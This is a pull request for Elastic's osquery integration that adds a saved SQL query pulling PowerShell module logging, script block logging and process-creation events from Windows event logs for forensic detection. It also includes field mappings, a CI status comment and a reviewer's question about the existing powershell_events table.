[Osquery_manager] Powershell history artifact saved query

[tomsonpl]

PowerShell History Artifact

The PowerShell History artifact provides comprehensive forensic visibility into PowerShell execution activity by capturing module logging (Event ID 4103), script block logging (Event ID 4104), and process creation with command line auditing (Event ID 4688). This multi-layered approach enables detection of obfuscated commands, full script execution analysis, and parent/child process relationship tracking for fileless malware investigations.

Core Forensic Artifacts Coverage

#	Artifact	✓	OS	Query	File	Description
1	PowerShell History	✅	Windows	powershell_history_windows_elastic	a1b2c3d4	Comprehensive PowerShell forensic monitoring capturing module logging, script block logging, and process creation events

Queries by Platform

---

🪟 Windows - PowerShell Execution & Fileless Malware Detection

Description

Comprehensive PowerShell forensic monitoring query that captures three critical event types from Windows Event Logs to detect suspicious PowerShell activity and fileless malware execution. The query correlates module logging (Event ID 4103) for obfuscated command detection, script block logging (Event ID 4104) for full script content analysis, and process creation events (Event ID 4688) for command line auditing and process relationship tracking. This multi-layered approach provides complete visibility into PowerShell-based attacks aligned with MITRE ATT&CK technique T1059.001.

Detection Focus:

• Obfuscated PowerShell commands through module logging context analysis
• Full script execution content via script block logging capture
• Command line parameters and encoded commands through process creation auditing
• Parent/child process relationships for detecting PowerShell spawned from suspicious processes
• Fileless malware execution patterns and in-memory script execution
• Script block IDs for tracking multi-part PowerShell script execution
• PowerShell provider activity and context information for attack chain analysis

Result

Query results provide three distinct data sets:

• Event ID 4103: Provider name, context information, and payload data showing obfuscated command execution
• Event ID 4104: Script block IDs, full script text, and script paths revealing complete PowerShell code execution
• Event ID 4688: Command line arguments, process names, and parent process names for process creation correlation

This comprehensive approach enables security analysts to reconstruct complete PowerShell attack chains, from initial execution to payload delivery.

Platform

windows

Interval

300 seconds (5 minutes)

Query ID

powershell_history_windows_elastic

ECS Field Mappings

• event.created → datetime
• event.code → eventid
• event.provider → provider_name
• log.level → level
• host.name → computer_name
• process.pid → pid
• process.thread.id → tid
• event.action → task
• powershell.provider.name → ProviderName
• powershell.context_info → ContextInfo
• powershell.payload → Payload
• powershell.file.script_block_id → ScriptBlockId
• powershell.file.script_block_text → ScriptBlockText
• file.path → ScriptPath
• process.command_line → CommandLine
• process.name → ProcessName
• process.parent.name → ParentProcessName

SQL Query

-- Comprehensive PowerShell Forensic Monitoring Query
-- Captures Event IDs 4103 (Module Logging), 4104 (Script Block Logging), 4688 (Process Creation)
-- Source: windows_eventlog table - Windows Event Logs (Historical)
-- Focus: Fileless malware detection, obfuscated command tracking, command line auditing
-- MITRE ATT&CK: T1059.001 (PowerShell)
-- Last updated: 2025-11-21

-- Query PowerShell Operational logs for Event IDs 4103 and 4104
SELECT
    datetime,
    eventid,
    provider_name,
    level,
    task,
    computer_name,
    channel,
    pid,
    tid,
    data,
    -- Event ID 4103: Module Logging - Extract obfuscated command context
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.ProviderName')
        ELSE NULL
    END AS ProviderName,
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.ContextInfo')
        ELSE NULL
    END AS ContextInfo,
    CASE
        WHEN eventid = 4103 THEN json_extract(data, '$.EventData.Payload')
        ELSE NULL
    END AS Payload,
    -- Event ID 4104: Script Block Logging - Extract full script content
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.ScriptBlockId')
        ELSE NULL
    END AS ScriptBlockId,
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.ScriptBlockText')
        ELSE NULL
    END AS ScriptBlockText,
    CASE
        WHEN eventid = 4104 THEN json_extract(data, '$.EventData.Path')
        ELSE NULL
    END AS ScriptPath,
    NULL AS CommandLine,
    NULL AS ProcessName,
    NULL AS ParentProcessName
FROM windows_eventlog
WHERE
    channel = 'Microsoft-Windows-PowerShell/Operational'
    AND eventid IN (4103, 4104)
UNION ALL
-- Query Security logs for Event ID 4688 (Process Creation)
SELECT
    datetime,
    eventid,
    provider_name,
    level,
    task,
    computer_name,
    channel,
    pid,
    tid,
    data,
    NULL AS ProviderName,
    NULL AS ContextInfo,
    NULL AS Payload,
    NULL AS ScriptBlockId,
    NULL AS ScriptBlockText,
    NULL AS ScriptPath,
    -- Event ID 4688: Process Creation - Extract command line and process hierarchy
    json_extract(data, '$.EventData.CommandLine') AS CommandLine,
    json_extract(data, '$.EventData.NewProcessName') AS ProcessName,
    json_extract(data, '$.EventData.ParentProcessName') AS ParentProcessName
FROM windows_eventlog
WHERE
    channel = 'Security'
    AND eventid = 4688
    AND data LIKE '%powershell%'
ORDER BY datetime DESC;

This PR was AI assisted by Claude Code

[elasticmachine]

💚 Build Succeeded

• Buildkite Build
• Commit: 00dad67

History

• 💔 Build #34480 failed da4e383

[raqueltabuyo]

What it is difference with powershell_events table? I am not sure if the data retrieved from this query will be parsed properly and if the whole powershell block is reconstructed to show the full content. https://osquery.io/schema/5.20.0/#powershell_events